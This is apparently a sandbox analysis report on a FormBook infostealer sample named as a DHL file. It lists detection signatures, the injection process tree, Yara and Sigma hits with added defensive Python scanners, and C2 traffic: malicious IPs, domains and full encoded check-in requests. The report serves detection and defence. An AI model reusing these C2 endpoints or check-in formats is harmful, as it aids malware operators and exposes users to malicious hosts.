
Windows Analysis Report
DHL 40312052024.exe

Overview

General Information

Sample name: DHL 40312052024.exe
Analysis ID: 1570503
MD5: 76d2944f234154fa8d4c251ec4c621be
SHA1: 47879dc1ba25220085eddb2f8aa0b29369909bef
SHA256: c45d7adb88147a71f85263d1e1f3394cb3edb67b2659986a1c6785326d4357b0
Tags: DHL, exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL 40312052024.exe (PID: 764 cmdline: "C:\Users\user\Desktop\DHL 40312052024.exe" MD5: 76D2944F234154FA8D4C251EC4C621BE)
    • svchost.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\DHL 40312052024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oYzsgiLOOTqCTABCCGZlOCaAgG.exe (PID: 1852 cmdline: "C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5032 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • oYzsgiLOOTqCTABCCGZlOCaAgG.exe (PID: 4568 cmdline: "C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 further entries not shown)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
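Both tables report the same two byte strings ($a2 and $a3) of the Windows_Trojan_Formbook_1112e116 rule, at a different offset in each dump. The Python below is an added example, not part of the report and not the Yara rule itself: it compiles those two hex strings (copied from the tables above) into byte regexes and lists every offset at which they occur in a buffer, in the same 0xOFFSET:$id form the tables use. It runs on a constructed buffer with both patterns embedded at known positions; scan_file() does the same for a dump on disk. Two strings alone are a triage check, not the rule: the full rule carries more strings and a condition, so a hit here should be confirmed with the real rule before it is called a match.

```python
import re

# The two hex strings listed for Windows_Trojan_Formbook_1112e116 in the tables above,
# copied verbatim; '??' may be used as a single-byte wildcard in the same notation.
FORMBOOK_PATTERNS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def hex_to_regex(hex_string: str) -> re.Pattern:
    """Turn a Yara-style hex string into a compiled bytes regex ('??' = any one byte)."""
    parts = []
    for tok in hex_string.split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: hex_to_regex(h) for name, h in FORMBOOK_PATTERNS.items()}


def scan_buffer(buf: bytes) -> list[tuple[int, str]]:
    """Return (offset, string_id) for every occurrence of every pattern, sorted by offset."""
    hits = []
    for name, rx in COMPILED.items():
        for m in rx.finditer(buf):
            hits.append((m.start(), name))
    return sorted(hits)


def scan_file(path: str) -> list[tuple[int, str]]:
    """Scan a memory dump or unpacked PE on disk."""
    with open(path, "rb") as f:
        return scan_buffer(f.read())


def format_hits(hits: list[tuple[int, str]]) -> list[str]:
    """Render hits like the report's string column, e.g. '0x2a6e0:$a2'."""
    return [f"0x{off:x}:{name}" for off, name in hits]


def build_sample() -> bytes:
    """Constructed test buffer: 1024 bytes of non-matching filler, $a3, filler, $a2, filler.
    bytes(range(256)) never contains either pattern, so the only hits are the embedded ones."""
    filler = bytes(range(256)) * 4
    a2 = bytes.fromhex(FORMBOOK_PATTERNS["$a2"].replace(" ", ""))
    a3 = bytes.fromhex(FORMBOOK_PATTERNS["$a3"].replace(" ", ""))
    return filler + a3 + filler + a2 + filler


if __name__ == "__main__":
    for line in format_hits(scan_buffer(build_sample())):
        print(line)
```

Offsets are relative to the start of the buffer, so for a memory dump they line up with the report's values only if the dump starts at the same base the report used.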

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 40312052024.exe, ParentProcessId: 764, ParentProcessName: DHL 40312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ProcessId: 6488, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 40312052024.exe, ParentProcessId: 764, ParentProcessName: DHL 40312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ProcessId: 6488, ProcessName: svchost.exe
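Both Sigma hits describe one event: svchost.exe (PID 6488) created by the sample (PID 764) with the sample's own command line, which is the trace left behind when a process is started suspended and its image replaced (compare "Creates a process in suspended mode" and "Writes to foreign memory regions" in the signature list). Because this svchost.exe is the copy in C:\Windows\SysWOW64, a file-hash check says nothing useful; the tell is the unusual parent and the mismatch between command line and image. The Python below is an added example, not the Sigma rule's text and not code from the report: it runs both checks over constructed process-creation events laid out with the same field names as the Sigma data above. The first event is the report's own; the other two are made up as benign contrast. The parent allow-list is an assumption that approximates the rule's filter, not the rule's actual list.

```python
import ntpath

# Parents from which svchost.exe is normally started. ASSUMPTION: this approximates the
# filter of the "Uncommon Svchost Parent Process" Sigma rule; it is not the rule's text.
EXPECTED_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "ngen.exe", "tiworker.exe",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def cmdline_executable(cmdline: str) -> str:
    """Return the executable named by a Windows command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def uncommon_svchost_parent(ev: dict) -> bool:
    """svchost.exe started by something other than the usual service-manager parents."""
    return (basename(ev["Image"]) == "svchost.exe"
            and basename(ev["ParentImage"]) not in EXPECTED_SVCHOST_PARENTS)


def image_cmdline_mismatch(ev: dict) -> bool:
    """Command line names a different executable than the image that actually runs:
    the shape of a process created suspended and then overwritten with other code."""
    return basename(cmdline_executable(ev["CommandLine"])) != basename(ev["Image"])


def triage(events: list[dict]) -> list[dict]:
    """Run both checks over process-creation events; one finding per flagged process."""
    findings = []
    for ev in events:
        reasons = []
        if uncommon_svchost_parent(ev):
            reasons.append("uncommon svchost parent: " + ev["ParentImage"])
        if image_cmdline_mismatch(ev):
            reasons.append("command line names " + cmdline_executable(ev["CommandLine"])
                           + " but image is " + ev["Image"])
        if reasons:
            findings.append({"ProcessId": ev["ProcessId"], "reasons": reasons})
    return findings


# Constructed events. The first mirrors the svchost.exe creation in the Sigma hits above
# (PID 6488 spawned by PID 764); the other two are made up as benign contrast.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\DHL 40312052024.exe"',
     "ParentImage": r"C:\Users\user\Desktop\DHL 40312052024.exe",
     "ProcessId": 6488, "ParentProcessId": 764},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "ProcessId": 1234, "ParentProcessId": 700},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt',
     "ParentImage": r"C:\Windows\explorer.exe",
     "ProcessId": 4321, "ParentProcessId": 4000},
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["ProcessId"], "; ".join(f["reasons"]))
```

The command-line check is the more general of the two: it also fires when the hollowed target is not svchost.exe, which matters because the same technique is applied further down the tree (netbtugc.exe and the browser processes).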
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-07T07:00:32.905597+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49738 | 154.215.72.110 | 80 | TCP
2024-12-07T07:01:06.875724+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49819 | 116.50.37.244 | 80 | TCP
2024-12-07T07:02:30.424909+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49874 | 85.159.66.93 | 80 | TCP
2024-12-07T07:02:45.221540+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49987 | 91.195.240.94 | 80 | TCP
2024-12-07T07:03:09.133637+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | TCP
2024-12-07T07:03:24.769279+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49995 | 195.110.124.133 | 80 | TCP
2024-12-07T07:03:56.385111+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49999 | 217.196.55.202 | 80 | TCP


            AV Detection

Source: http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB; Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB; Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB; Avira URL Cloud: Label: malware
Source: DHL 40312052024.exe; ReversingLabs: Detection: 47%
Source: DHL 40312052024.exe; Virustotal: Detection: 41%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL 40312052024.exe; Joe Sandbox ML: detected
Source: DHL 40312052024.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120500383.00000000005AE000.00000002.00000001.01000000.00000004.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278282090.00000000005AE000.00000002.00000001.01000000.00000004.sdmp (this PDB path is Joe Security's FakeChrome tool: the oYzsgiLOOTqCTABCCGZlOCaAgG.exe processes in the tree are the sandbox's stand-in browser that the injected code targeted, not a binary written by the sample)
            Source: Binary string: wntdll.pdbUGP source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0081445A
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081C6D1 FindFirstFileW,FindClose, 0_2_0081C6D1
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0081C75C
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0081EF95
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0081F0F2
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0081F3F3
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_008137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008137EF
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_00813B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00813B12
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_0081BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0081BCBC

            Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49819 -> 116.50.37.244:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 154.215.72.110:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49874 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 195.110.124.133:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 217.196.55.202:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 66.29.149.46:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 91.195.240.94:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View; IP Address: 91.195.240.94
Source: Joe Sandbox View; IP Address: 154.215.72.110
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 15 times)
Source: C:\Users\user\Desktop\DHL 40312052024.exe; Code function: 0_2_008222EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_008222EE
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected: GET /fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
